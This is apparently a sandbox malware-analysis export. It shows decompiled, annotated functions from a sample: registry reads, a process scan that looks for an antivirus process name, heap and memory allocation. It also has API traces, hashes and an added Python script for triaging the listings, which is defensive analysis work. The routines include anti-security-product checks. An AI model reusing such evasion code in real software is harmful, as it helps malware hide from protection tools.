                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                               			// Annotated: reads a registry value into a freshly allocated heap buffer. The parameters double as scratch
                               			// slots, which is why the decompiler shows them being overwritten:
                               			//   _a4  non-zero: try the alternative reader E049D8FEC first (its subcalls use SafeArray/OLE, i.e. the WMI
                               			//        route flagged in the signatures) and fall back to the registry API only if it fails; afterwards _a4
                               			//        holds the value size reported by RegQueryValueExW
                               			//   _a8  root key (0x80000002 = HKEY_LOCAL_MACHINE in the trace below), later the value type
                               			//   _a12 subkey name, later the opened HKEY
                               			//   _a16 value name; *_a20 receives the data buffer, *_a24 (optional) its byte length
                               			// Returns 0 on success, else a Win32 error: the RegOpenKeyW status, 0xe8 (ERROR_NO_DATA) for an empty value,
                               			// 8 (ERROR_NOT_ENOUGH_MEMORY) if the allocation fails, or the status of the second RegQueryValueExW.
                               			// The data is returned exactly as stored: REG_SZ data is not guaranteed to be NUL-terminated, so callers
                               			// have to rely on the length written to *_a24.
                               			E049D5607(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                               				long _t26;
                               				intOrPtr* _t38;
                               				char* _t42;
                               				long _t43;
                               
                               				if(_a4 == 0) {
                               					L2:
                               					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                               					_t43 = _t26;
                               					if(_t43 == 0) {
                               						// size probe with a NULL buffer: the required size comes back in _a4 (this call's status is not checked)
                               						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                               						if(_a4 == 0) {
                               							_t43 = 0xe8;
                               						} else {
                               							_t42 = E049D55DC(_a4); // heap allocation of the probed size (its counterpart E049D6DFA wraps RtlFreeHeap, see APIs)
                               							if(_t42 == 0) {
                               								_t43 = 8;
                               							} else {
                               								// second query fills the buffer; on failure it is freed, on success ownership passes to the caller
                               								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                               								if(_t43 != 0) {
                               									E049D6DFA(_t42);
                               								} else {
                               									 *_a20 = _t42;
                               									_t38 = _a24;
                               									if(_t38 != 0) {
                               										 *_t38 = _a4;
                               									}
                               								}
                               							}
                               						}
                               						RegCloseKey(_a12);
                               					}
                               					L12:
                               					return _t43;
                               				}
                               				_t43 = E049D8FEC(_a4, _a8, _a12, _a16, _a20, _a24); // alternative reader; 0 means it already filled *_a20/*_a24
                               				if(_t43 == 0) {
                               					goto L12;
                               				}
                               				goto L2;
                               			}
                               
                               Statement addresses (the per-line address column of the C-Code above, flattened here in source order; entries of 0x00000000 belong to lines with no instruction address of their own):
                               0x049d5613, 0x049d5636, 0x049d5640, 0x049d5646, 0x049d564a, 0x049d5662, 0x049d5667, 0x049d56af, 0x049d5669, 0x049d5671, 0x049d5675, 0x049d56ac, 0x049d5677, 0x049d5689, 0x049d568d, 0x049d56a3, 0x049d568f, 0x049d5692, 0x049d5694, 0x049d5699, 0x049d569e, 0x049d569e, 0x049d5699, 0x049d568d, 0x049d5675, 0x049d56b7, 0x049d56b7, 0x049d56be, 0x049d56c4, 0x049d56c4, 0x049d562c, 0x049d5630, 0x00000000, 0x00000000, 0x00000000

                              APIs
                              • RegOpenKeyW.ADVAPI32(80000002,05819C46,05819C46), ref: 049D5640
                              • RegQueryValueExW.KERNEL32(05819C46,?,00000000,80000002,00000000,00000000,?,049D49C4,3D049DC0,80000002,049D6096,00000000,049D6096,?,05819C46,80000002), ref: 049D5662
                              • RegQueryValueExW.ADVAPI32(05819C46,?,00000000,80000002,00000000,00000000,00000000,?,049D49C4,3D049DC0,80000002,049D6096,00000000,049D6096,?,05819C46), ref: 049D5687
                              • RegCloseKey.ADVAPI32(05819C46,?,049D49C4,3D049DC0,80000002,049D6096,00000000,049D6096,?,05819C46,80000002,00000000,?), ref: 049D56B7
                                • Part of subcall function 049D8FEC: SafeArrayDestroy.OLEAUT32(00000000), ref: 049D9071
                                • Part of subcall function 049D6DFA: RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                              • String ID:
                              • API String ID: 486277218-0
                              • Opcode ID: 746bc7c39a5f4a4a90d1ce96cb67572c37a2bc91c4e35eede19df6bdd913c40d
                              • Instruction ID: b03706e4610f3f146deff9eb3576b7f7cda2ab6b525b9876b611eaad32f5e877
                              • Opcode Fuzzy Hash: 746bc7c39a5f4a4a90d1ce96cb67572c37a2bc91c4e35eede19df6bdd913c40d
                              • Instruction Fuzzy Hash: A821397250015DBFDF11AE94DC80CEE7B6EFB482A0B468436FE159B120D731AD61DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,053DD0D4,80000001,?,?,80000001), ref: 053E1F71
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 053E1F88
                              • HeapFree.KERNEL32(00000000,00000000,?,053DD0D4,80000001,?,?,80000001,?,?,00000000,?,?,?,053C2E53,80000001), ref: 053E1FA3
                              • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,053DD0D4,80000001,?,?,80000001,?,?,00000000), ref: 053E1FC2
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HeapQueryValue$AllocateFree
                              • String ID:
                              • API String ID: 4267586637-0
                              • Opcode ID: bbc65b65a190ac063adc926435d70aad2de30c19b0daff34fe594753baf3642d
                              • Instruction ID: 9f6011767a7282170c01445cffef0177058af29ba7763c5a02fd4d2776a73264
                              • Opcode Fuzzy Hash: bbc65b65a190ac063adc926435d70aad2de30c19b0daff34fe594753baf3642d
                              • Instruction Fuzzy Hash: B61149B6910118BFDB228E88DC84CAEBBBDFB88710B104166F902A6250D6715E41DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,053F01F4,00000000,053CB176,?,053C145C,?), ref: 053D92A7
                              • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,053F01F4,00000000,053CB176,?,053C145C,?), ref: 053D92B2
                              • _wcsupr.NTDLL ref: 053D92BF
                              • lstrlenW.KERNEL32(00000000), ref: 053D92C7
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                              • String ID:
                              • API String ID: 2533608484-0
                              • Opcode ID: c5ecc8838ae7a6d9f00b51620a939a7c8ea4164350503e9ed07db0bab695b3a2
                              • Instruction ID: 9ea34d79834cc836452f26cf1f7924556b794ec12181482d41c600120a018331
                              • Opcode Fuzzy Hash: c5ecc8838ae7a6d9f00b51620a939a7c8ea4164350503e9ed07db0bab695b3a2
                              • Instruction Fuzzy Hash: 9AF0B4377051246F93226A746CCDE6FAFEDBB85B51F100529F851DA080DFA4CC0146B4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 68%
                               			// Annotated: walks the process list and returns 1 if a running process's image name matches the string at
                               			// (*0x49dd2b8) + 0x49dee88, else 0. _v300 is a PROCESSENTRY32 and _v264 its szExeFile member (offset 36).
                               			// The comparison is an indirect call through the function pointer stored at 0x49dd110 (unresolved in this
                               			// dump). The decompiler's annotation 0x73617661 on the target string is little-endian ASCII "avas", i.e. the
                               			// first four bytes of the process name being looked for.
                               			E049D3309() {
                               				char _v264;
                               				void* _v300;
                               				void* _t5;
                               				int _t8;
                               				intOrPtr _t9;
                               				int _t15;
                               				void* _t17;
                               
                               				_t15 = 0;
                               				_t5 = CreateToolhelp32Snapshot(2, 0); // executed; 2 = TH32CS_SNAPPROCESS
                               				_t17 = _t5;
                               				if(_t17 != 0) {
                               					_t8 = Process32First(_t17,  &_v300);
                               					while(_t8 != 0) {
                               						_t9 =  *0x49dd2b8; // 0xe3a5a8
                               						_t2 = _t9 + 0x49dee88; // 0x73617661
                               						_push( &_v264);
                               						if( *0x49dd110() != 0) { // compare(szExeFile, target string) through the function pointer
                               							_t15 = 1; // match: stop walking
                               						} else {
                               							_t8 = Process32Next(_t17,  &_v300);
                               							continue;
                               						}
                               						L7:
                               						CloseHandle(_t17); // reached on a match and when Process32Next runs out of entries
                               						goto L8;
                               					}
                               					goto L7;
                               				}
                               				L8:
                               				return _t15;
                               			}
                               
                               Statement addresses (the per-line address column of the C-Code above, flattened here in source order; entries of 0x00000000 belong to lines with no instruction address of their own):
                               0x049d3314, 0x049d3319, 0x049d331e, 0x049d3322, 0x049d332c, 0x049d335d, 0x049d3333, 0x049d3338, 0x049d3345, 0x049d334e, 0x049d3365, 0x049d3350, 0x049d3358, 0x00000000, 0x049d3358, 0x049d3366, 0x049d3367, 0x00000000, 0x049d3367, 0x00000000, 0x049d3361, 0x049d336d, 0x049d3372

                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 049D3319
                              • Process32First.KERNEL32(00000000,?), ref: 049D332C
                              • Process32Next.KERNEL32(00000000,?), ref: 049D3358
                              • CloseHandle.KERNEL32(00000000), ref: 049D3367
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: cec6ef6dd2bef25febaf793b9a6ce76a5d07ad5bfbd4dc626ad5374d22759a1c
                              • Instruction ID: 911b91b194654fb7fbe0d0711b651a17f2092bcc1d4ba99394d7d6a9dca755ef
                              • Opcode Fuzzy Hash: cec6ef6dd2bef25febaf793b9a6ce76a5d07ad5bfbd4dc626ad5374d22759a1c
                              • Instruction Fuzzy Hash: 0EF0E0326060286BE730BA65DD49DEBB7ACEBC5755F40C171FD55D3000EE34F98586A2
                              Uniqueness

                              Uniqueness Score: -1.00%
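The "APIs" listings in this view (for example the ones above for E049D6006, E049D3309 and E049D5607) are plain text once the report is exported, which makes it tedious to see at a glance what a function does or which hive a registry call targets. The following Python script is an added example, not code from Joe Sandbox or from the analysed sample: it parses those lines, groups them per function, tags a few common behaviour patterns, names the hive handle passed to RegOpenKey* calls, and decodes little-endian dword constants such as the 0x73617661 annotation in E049D3309. The embedded SAMPLE is copied from the listings on this page; the behaviour rules, the hive table and every function name are the author's own assumptions.

```python
"""Triage helper for the flattened "APIs" listings of a Joe Sandbox function view.

Added example for this report; not code from Joe Sandbox or from the analysed sample.
SAMPLE is copied from the listings for E049D6006, E049D3309 and E049D5607 on this page.
The behaviour rules, the hive table and every function name here are the author's own.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# One listing line, e.g.
#   • Process32First.KERNEL32(00000000,?), ref: 049D332C
#   • Part of subcall function 049DA614: RegOpenKeyExA.KERNEL32(80000003,...), ref: 049DA63A
#   • GetTickCount.KERNEL32 ref: 049D2327          (no argument list at all)
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Hive handles as they appear in the first argument of RegOpenKey*/RegOpenKeyEx* (Win32 constants).
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}

# Author's triage rules: a tag applies when every listed API occurs in the block.
RULES = {
    "process enumeration": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "registry read": {"RegQueryValueExW"},
    "registry key enumeration": {"RegEnumKeyExA"},
    "event signalling": {"CreateEventA", "SetEvent"},
    "sleep / delay": {"Sleep"},
}

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]  # hex arguments as ints, None where the tracer printed "?"
    ref: int                   # call-site address
    subcall: Optional[int]     # address of the subcall the line is attributed to, None if direct

def parse_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    args: List[Optional[int]] = []
    if m.group("args"):
        for tok in m.group("args").split(","):
            tok = tok.strip()
            args.append(None if tok == "?" else int(tok, 16))
    sub = m.group("sub")
    return ApiCall(m.group("api"), m.group("module"), args,
                   int(m.group("ref"), 16), int(sub, 16) if sub else None)

def parse_blocks(text: str) -> List[List[ApiCall]]:
    """One list of calls per 'APIs' section; a section ends at the 'Memory Dump Source' header."""
    blocks: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            blocks.append(current)
        elif stripped == "Memory Dump Source":
            current = None
        elif current is not None:
            call = parse_line(line)
            if call is not None:
                current.append(call)
    return blocks

def tag_block(calls: List[ApiCall], include_subcalls: bool = True) -> Set[str]:
    names = {c.api for c in calls if include_subcalls or c.subcall is None}
    return {tag for tag, needed in RULES.items() if needed <= names}

def registry_hives(calls: List[ApiCall]) -> List[str]:
    """Hive names passed to RegOpenKey* calls, in listing order ('?' handles are skipped)."""
    return [HIVES[c.args[0]] for c in calls
            if c.api.startswith("RegOpenKey") and c.args and c.args[0] in HIVES]

def decode_dword_ascii(value: int) -> Optional[str]:
    """Read a 32-bit constant as it lies in memory (little-endian); return it if all four bytes print."""
    raw = value.to_bytes(4, "little")
    return raw.decode("ascii") if all(0x20 <= b < 0x7F for b in raw) else None

SAMPLE = """\
APIs
• CreateEventA.KERNEL32(049DD2E4,00000001,00000000,00000040,?,?,747DF710,00000000,747DF730), ref: 049D6057
• SetEvent.KERNEL32(00000000), ref: 049D6064
• Sleep.KERNEL32(00000BB8), ref: 049D606F
• CloseHandle.KERNEL32(00000000), ref: 049D6076
  • Part of subcall function 049DA614: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,049D6096,?), ref: 049DA63A
  • Part of subcall function 049DA614: RegEnumKeyExA.KERNEL32(?,?,?,049D6096,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,049D6096), ref: 049DA681
Memory Dump Source
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 049D3319
• Process32First.KERNEL32(00000000,?), ref: 049D332C
• Process32Next.KERNEL32(00000000,?), ref: 049D3358
• CloseHandle.KERNEL32(00000000), ref: 049D3367
Memory Dump Source
APIs
• RegOpenKeyW.ADVAPI32(80000002,05819C46,05819C46), ref: 049D5640
• RegQueryValueExW.KERNEL32(05819C46,?,00000000,80000002,00000000,00000000,?,049D49C4,3D049DC0,80000002,049D6096,00000000,049D6096,?,05819C46,80000002), ref: 049D5662
• RegCloseKey.ADVAPI32(05819C46,?,049D49C4,3D049DC0,80000002,049D6096,00000000,049D6096,?,05819C46,80000002,00000000,?), ref: 049D56B7
Memory Dump Source
"""

if __name__ == "__main__":
    for i, block in enumerate(parse_blocks(SAMPLE)):
        print(f"block {i}: {sorted(tag_block(block))} hives={registry_hives(block)}")
    print(decode_dword_ascii(0x73617661))  # the constant annotated in E049D3309
```

Subcall lines are included in the tags by default because the report attributes them to the function; pass include_subcalls=False to see only what the function calls directly, which is the distinction that matters when deciding which address to hook or break on.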

                              APIs
                              • InterlockedIncrement.KERNEL32(053F00BC), ref: 053C5285
                                • Part of subcall function 053DD9F4: GetSystemTimeAsFileTime.KERNEL32(?), ref: 053DDA1F
                                • Part of subcall function 053DD9F4: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 053DDA2C
                                • Part of subcall function 053DD9F4: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 053DDAB8
                                • Part of subcall function 053DD9F4: GetModuleHandleA.KERNEL32(00000000), ref: 053DDAC3
                                • Part of subcall function 053DD9F4: RtlImageNtHeader.NTDLL(00000000), ref: 053DDACC
                                • Part of subcall function 053DD9F4: RtlExitUserThread.NTDLL(00000000), ref: 053DDAE1
                              • InterlockedDecrement.KERNEL32(053F00BC), ref: 053C52A9
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                              • String ID: t
                              • API String ID: 1011034841-2238339752
                              • Opcode ID: fc4103548cc1f9923465ae316b6032dc8d20742024f3d5d559ef334824391b5e
                              • Instruction ID: 86c6c774a97cdaf9df89bddd28dcc4666fe577b5e8edfb2e75f3b3b68d07e905
                              • Opcode Fuzzy Hash: fc4103548cc1f9923465ae316b6032dc8d20742024f3d5d559ef334824391b5e
                              • Instruction Fuzzy Hash: 9DE01231389231A7C7225A78980CF6ABFDAFB50755F40465CF94BD4190DA61DC109792
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                               			// Annotated: start-up routine. Creates the module's private heap (0x400000 bytes initially committed,
                               			// dwMaximumSize = 0 so it is growable); the handle is kept in the global at 0x49dd270 and is the one
                               			// RtlAllocateHeap receives in E049D456E below. The start tick count is saved in the global at 0x49dd160,
                               			// then the initialisation chain runs. Returns 0 on success, 8 (ERROR_NOT_ENOUGH_MEMORY) if HeapCreate
                               			// fails, or the error code of E049D2CBF / E049D587D.
                               			E049D230A(signed int __edx, void* __edi, intOrPtr _a4) {
                               				void* _t3;
                               				void* _t5;
                               				void* _t8;
                               				void* _t9;
                               				void* _t10;
                               				signed int _t11;
                               
                               				_t11 = __edx;
                               				_t3 = HeapCreate(0, 0x400000, 0); // executed
                               				 *0x49dd270 = _t3;
                               				if(_t3 == 0) {
                               					_t9 = 8;
                               					return _t9;
                               				}
                               				E049DD160 = GetTickCount();
                               				_t5 = E049D2CBF(_a4);
                               				if(_t5 == 0) {
                               					E049D2EBD(_t10, __edi, _a4); // executed
                               					if(E049D3AF1(_t10) != 0) {
                               						 *0x49dd298 = 1; // executed; global flag consulted elsewhere in the module
                               					}
                               					_t8 = E049D587D(_t11); // executed
                               					return _t8;
                               				}
                               				return _t5;
                               			}
                               
                               Statement addresses (the per-line address column of the C-Code above, flattened here in source order; entries of 0x00000000 belong to lines with no instruction address of their own):
                               0x049d230a, 0x049d2313, 0x049d231b, 0x049d2320, 0x049d2324, 0x00000000, 0x049d2324, 0x049d2331, 0x049d2336, 0x049d233d, 0x049d2343, 0x049d234f, 0x049d2351, 0x049d2351, 0x049d235b, 0x00000000, 0x049d235b, 0x049d2360

                              APIs
                              • HeapCreate.KERNEL32(00000000,00400000,00000000,049D4154,?), ref: 049D2313
                              • GetTickCount.KERNEL32 ref: 049D2327
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000004.00020000.sdmp
                              Similarity
                              • API ID: CountCreateHeapTick
                              • String ID: Txt
                              • API String ID: 2177101570-4033135041
                              • Opcode ID: 2f476d64e8727b90594d010f29c1f0fca4955bbec3e3286ce0b9032131683e50
                              • Instruction ID: c501dc79d834557adcc5e867b3fe2bf0176f83347faf37d424e5c3adb82267d8
                              • Opcode Fuzzy Hash: 2f476d64e8727b90594d010f29c1f0fca4955bbec3e3286ce0b9032131683e50
                              • Instruction Fuzzy Hash: 30E09234289300AAFB206F709D06B19BAA8FB44B89F00C574E509D1190EB74F840D622
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 053CEAA5
                              • memcpy.NTDLL ref: 053CEACD
                                • Part of subcall function 053D09CA: NtAllocateVirtualMemory.NTDLL(053CC119,00000000,00000000,053CC119,00003000,00000040), ref: 053D09FB
                                • Part of subcall function 053D09CA: RtlNtStatusToDosError.NTDLL(00000000), ref: 053D0A02
                                • Part of subcall function 053D09CA: SetLastError.KERNEL32(00000000), ref: 053D0A09
                              • GetLastError.KERNEL32(00000010,00000218,053E8D4D,00000100,?,00000318,00000008), ref: 053CEAE4
                              • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,053E8D4D,00000100), ref: 053CEBC7
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                              • String ID:
                              • API String ID: 685050087-0
                              • Opcode ID: 2e4aac379384272ac7f4963224db003f0a6114e02e0a5002c8e23124aee04dcf
                              • Instruction ID: 39f418454dbead8bb63f7539ca5f8afa481da01a531b65adfe7b9be5b128fd60
                              • Opcode Fuzzy Hash: 2e4aac379384272ac7f4963224db003f0a6114e02e0a5002c8e23124aee04dcf
                              • Instruction Fuzzy Hash: C1415FB2608301AFD721DF24D845FABFBE9BF48310F00492DF599C6290E770D9149B62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 79%
                              			E049D456E(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                              				char _v5;
                              				signed int _v12;
                              				intOrPtr _v16;
                              				char _t28;
                              				void* _t33;
                              				void* _t38;
                              				void* _t45;
                              				char* _t46;
                              				void* _t48;
                              				char* _t56;
                              				char* _t57;
                              				intOrPtr _t59;
                              				void* _t60;
                              
                              				_t56 = _a4;
                              				_t60 = __eax;
                              				_v12 = 0xb;
                              				if(_t56 != 0 && __eax != 0) {
                              					_t5 = _t60 - 1; // -1
                              					_t46 =  &(_t56[_t5]);
                              					_t28 =  *_t46;
                              					_v5 = _t28;
                              					 *_t46 = 0;
                              					__imp__(_a8, _t45);
                              					_v16 = _t28;
                              					_t57 = StrStrA(_t56, _a8);
                              					if(_t57 != 0) {
                              						 *_t46 = _v5;
                              						_t33 = RtlAllocateHeap( *0x49dd270, 0, _a16 + _t60); // executed
                              						_t48 = _t33;
                              						if(_t48 == 0) {
                              							_v12 = 8;
                              						} else {
                              							_t58 = _t57 - _a4;
                              							E049DAA99(_t57 - _a4, _a4, _t48);
                              							_t38 = E049DAA99(_a16, _a12, _t58 + _t48);
                              							_t53 = _v16;
                              							_t59 = _a16;
                              							E049DAA99(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
                              							 *_a20 = _t48;
                              							_v12 = _v12 & 0x00000000;
                              							 *_a24 = _t60 - _v16 + _t59;
                              						}
                              					}
                              				}
                              				return _v12;
                              			}

                              APIs
                              • lstrlen.KERNEL32(747DF710,?,00000000,?,747DF710), ref: 049D45A2
                              • StrStrA.SHLWAPI(00000000,?), ref: 049D45AF
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 049D45CE
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocateHeaplstrlen
                              • String ID:
                              • API String ID: 556738718-0
                              • Opcode ID: 3b851b0103feb6c7b54dc1330fe522d6e7a0d1e40f5fe1fbab9d3e0f54819b46
                              • Instruction ID: b640566342536e7fd91bbaea3b24e632073b368b4f2526c56cb90d5ffc7bccd7
                              • Opcode Fuzzy Hash: 3b851b0103feb6c7b54dc1330fe522d6e7a0d1e40f5fe1fbab9d3e0f54819b46
                              • Instruction Fuzzy Hash: CA216D3660011AAFCF11CFA9D984B9EBFB9EF85315F048265E804AB305C734E915CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053DA02D: lstrlen.KERNEL32(?,00000000,00000000,00000027,?,?,00000000,053DD07F,?,00000000,?,?,?,053C2E53,80000001), ref: 053DA063
                                • Part of subcall function 053DA02D: lstrcpy.KERNEL32(00000000,00000000), ref: 053DA087
                                • Part of subcall function 053DA02D: lstrcat.KERNEL32(00000000,00000000), ref: 053DA08F
                              • RegOpenKeyExA.KERNEL32(053C2E53,00000000,00000000,00020119,80000001,?,?,00000000,?,?,?,053C2E53,80000001), ref: 053DD09F
                              • RegOpenKeyExA.ADVAPI32(053C2E53,053C2E53,00000000,00020019,80000001,?,?,00000000,?,?,?,053C2E53,80000001), ref: 053DD0B5
                              • RegCloseKey.ADVAPI32(80000001,80000001,?,?,80000001,?,?,00000000,?,?,?,053C2E53,80000001), ref: 053DD0FE
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Open$Closelstrcatlstrcpylstrlen
                              • String ID:
                              • API String ID: 4131162436-0
                              • Opcode ID: d405516782483a5587719964f19adfe5b31fcc0d5f15c70b4c32436f66d977bd
                              • Instruction ID: 869d271c558f6f5030478d0febc8166f343e43fddf3237633eb74e5438126b2c
                              • Opcode Fuzzy Hash: d405516782483a5587719964f19adfe5b31fcc0d5f15c70b4c32436f66d977bd
                              • Instruction Fuzzy Hash: DE215EB6A00219BFCB01DF99EC85CAEBBBCFB44344B100476F501E6151DB71AE56DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 47%
                              			E049D311C(char* _a4, char** _a8) {
                              				char* _t7;
                              				char* _t11;
                              				char* _t14;
                              				char* _t16;
                              				char* _t17;
                              				char _t18;
                              				signed int _t20;
                              				signed int _t22;
                              
                              				_t16 = _a4;
                              				_push(0x20);
                              				_t20 = 1;
                              				_push(_t16);
                              				while(1) {
                              					_t7 = StrChrA();
                              					if(_t7 == 0) {
                              						break;
                              					}
                              					_t20 = _t20 + 1;
                              					_push(0x20);
                              					_push( &(_t7[1]));
                              				}
                              				_t11 = E049D55DC(_t20 << 2);
                              				_a4 = _t11;
                              				if(_t11 != 0) {
                              					StrTrimA(_t16, 0x49dc2a4); // executed
                              					_t22 = 0;
                              					do {
                              						_t14 = StrChrA(_t16, 0x20);
                              						if(_t14 != 0) {
                              							 *_t14 = 0;
                              							do {
                              								_t14 =  &(_t14[1]);
                              								_t18 =  *_t14;
                              							} while (_t18 == 0x20 || _t18 == 9);
                              						}
                              						_t17 = _a4;
                              						 *(_t17 + _t22 * 4) = _t16;
                              						_t22 = _t22 + 1;
                              						_t16 = _t14;
                              					} while (_t14 != 0);
                              					 *_a8 = _t17;
                              				}
                              				return 0;
                              			}

                              APIs
                              • StrChrA.SHLWAPI(?,00000020,00000000,058195AC,?,?,049D3A64,?,058195AC), ref: 049D3138
                              • StrTrimA.SHLWAPI(?,049DC2A4,00000002,?,049D3A64,?,058195AC), ref: 049D3156
                              • StrChrA.SHLWAPI(?,00000020,?,049D3A64,?,058195AC), ref: 049D3161
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Trim
                              • String ID:
                              • API String ID: 3043112668-0
                              • Opcode ID: 46b7f8f2ff3624e8bdbcf4e2ad6a2e363dbde6d0d31ad47d42472e829c8cfea2
                              • Instruction ID: 8e00e38733f49d55bc3435bd153f57e2860927b654ade5e992a85b6b120be732
                              • Opcode Fuzzy Hash: 46b7f8f2ff3624e8bdbcf4e2ad6a2e363dbde6d0d31ad47d42472e829c8cfea2
                              • Instruction Fuzzy Hash: C501BC72304346BEE7205E6A8C44F672B9EEBCD792F04C031BE45CB282D670E842C7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 64%
                              			E049D62E1(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                              				intOrPtr _v36;
                              				intOrPtr _v44;
                              				intOrPtr _v48;
                              				intOrPtr _v52;
                              				void _v60;
                              				char _v64;
